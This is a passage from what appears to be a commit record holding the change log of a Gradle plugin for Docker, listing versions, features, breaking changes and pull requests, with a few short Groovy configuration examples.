- {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create the file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during Gradle's configuration phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` then fall back to using the generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump Gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump Gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump version of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use the Groovy join function in favor of the JDK 8 join function. - {uri-github}\/pull\/498[Pull request 498]
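\n\nA minimal sketch of the `Closure<InputStream>` change called out in the v3.2.5 entry above (task name and tar path are hypothetical placeholders):\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.image.DockerLoadImage\n\ntask loadMyImage(type: DockerLoadImage) {\n    \/\/ the closure defers opening the stream until execution time,\n    \/\/ side-stepping eager evaluation during the configuration phase\n    inputStream = { new FileInputStream(file('build\/myapp-image.tar')) }\n}\n----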
\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standards - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump version of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump version of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump version of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke the onNext closure's call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows inspecting an exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`; instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. 
- {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump version of docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per single ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well as defaulting to the alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overridden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]
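\n\nThe reactive-stream handlers from the v3.0.4 and v3.0.5 entries above pair naturally with the `DockerLogsContainer` task added in v2.6.8; a minimal sketch, with task and container names as hypothetical placeholders:\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.DockerLogsContainer\n\ntask tailMyContainer(type: DockerLogsContainer) {\n    targetContainerId { 'my-container' }  \/\/ placeholder container name\n    follow = true\n    \/\/ onNext receives each log frame as it streams in\n    onNext { frame -> logger.quiet frame.toString() }\n    \/\/ onError receives any exception thrown by the request\n    onError { e -> logger.error('log streaming failed', e) }\n}\n----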
\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying a single file from a container and hostPath is set to a directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. 
Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` calls a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - {uri-github}\/issues\/75[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.
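\n\nA minimal sketch of the `registryCredentials` block introduced by the v2.1 rename above, assuming the same credential fields as before (all values are placeholders):\n\n[source,groovy]\n----\ndocker {\n    registryCredentials {\n        url = 'https:\/\/index.docker.io\/v1\/'\n        username = 'user'\n        password = 'password'\n        email = 'user@example.com'\n    }\n}\n----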
\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2015)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n** Fixed wrong assignment of key field in environment variable instruction.\n** Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly adding user-based instructions to the Dockerfile task with predefined instructions without messing up the order. 
- {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v6.5.0 (July 3, 2020)\n\n* Default to Docker Hub when no registry is explicitly given - {uri-github}\/issues\/942[Issue 942]\n* Upgrade of Docker Java library to version 3.2.5 and default the communication transport to Apache HttpClient 5 - {uri-github}\/issues\/942[Issue 942]\n\n[discrete]\n=== v6.4.0 (March 23, 2020)\n\n* Keep the network name and network ID separate in `DockerCreateNetwork` - {uri-github}\/issues\/920[Issue 920]\n* Upgrade ASM dependency to Java 13\/14-compatible version - {uri-github}\/issues\/929[Issue 929]\n\n[discrete]\n=== v6.3.0 (March 14, 2020)\n\n* Retrieve all known credentials for `DockerBuildImage` custom task - {uri-github}\/pull\/913[PR 913]\n* Add support for setting custom workingDir in `DockerExecContainer` task - {uri-github}\/pull\/927[PR 927]\n\n[discrete]\n=== v6.2.0 (March 10, 2020)\n\n* Upgrade Docker Java to next minor version - {uri-github}\/pull\/925[PR 925]\n* Expose property for providing extra hosts - {uri-github}\/pull\/926[PR 926]\n\n[discrete]\n=== v6.1.4 (February 23, 2020)\n\n* Nested property `FileInstruction.getFile()` renders a warning as it doesn't provide input or output annotation - {uri-github}\/issues\/919[Issue 919]\n\n[discrete]\n=== v6.1.3 (January 26, 2020)\n\n* Credentials helper JSON output parsing falls back to default if it cannot be read properly - {uri-github}\/pull\/909[PR 909]\n\n[discrete]\n=== v6.1.2 (January 14, 2020)\n\n* Decode base64 auth header - {uri-github}\/pull\/902[PR 902]\n\n[discrete]\n=== v6.1.1 (December 12, 2019)\n\n* Add debug logging in Docker configuration parsing - {uri-github}\/pull\/898[PR 898]\n\n[discrete]\n=== v6.1.0 (December 12, 2019)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n* Do not parse config file if it doesn't exist - {uri-github}\/issues\/887[Issue 887]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and 
`DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`, `DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to a nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issues\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issues\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is no longer injected into the method `runRemoteCommand` - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced 
with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix Gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting with the Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be 
renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for 